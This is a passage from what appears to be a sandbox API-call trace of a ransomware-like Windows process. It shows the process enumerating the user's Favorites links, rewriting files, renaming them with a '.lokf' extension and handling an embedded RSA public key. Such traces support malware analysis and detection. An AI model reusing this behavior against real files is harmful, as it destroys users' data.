dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85788 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85758 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.646] GetCurrentThreadId () returned 0x9e0 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84148 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.646] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.646] GetCurrentThreadId () returned 0x9e0 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85788 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857a0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85800 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85758 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.648] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.649] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857a0 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c880a0 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.649] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.650] WriteFile (in: hFile=0x5cc, lpBuffer=0x329e1f0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x329e1f0*, lpNumberOfBytesWritten=0x9f4fb14*=0xe7, lpOverlapped=0x0) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.650] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.650] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.650] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.650] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.650] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.650] CloseHandle (hObject=0x5cc) returned 1 [0059.651] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.651] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.651] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0059.651] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.lokf")) returned 1 [0059.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.652] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.652] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.653] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.653] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0059.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.653] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.653] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0059.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.653] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=226) returned 1 [0059.653] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.655] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.655] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.656] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.656] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.656] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.656] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe2, lpOverlapped=0x0) returned 1 [0059.656] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.656] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.656] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.656] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.657] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.657] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.657] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.657] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.657] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.657] GetLastError () returned 0x0 [0059.657] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.657] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.657] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.658] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.658] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.658] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe0) returned 0x32652c0 [0059.658] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c880a0 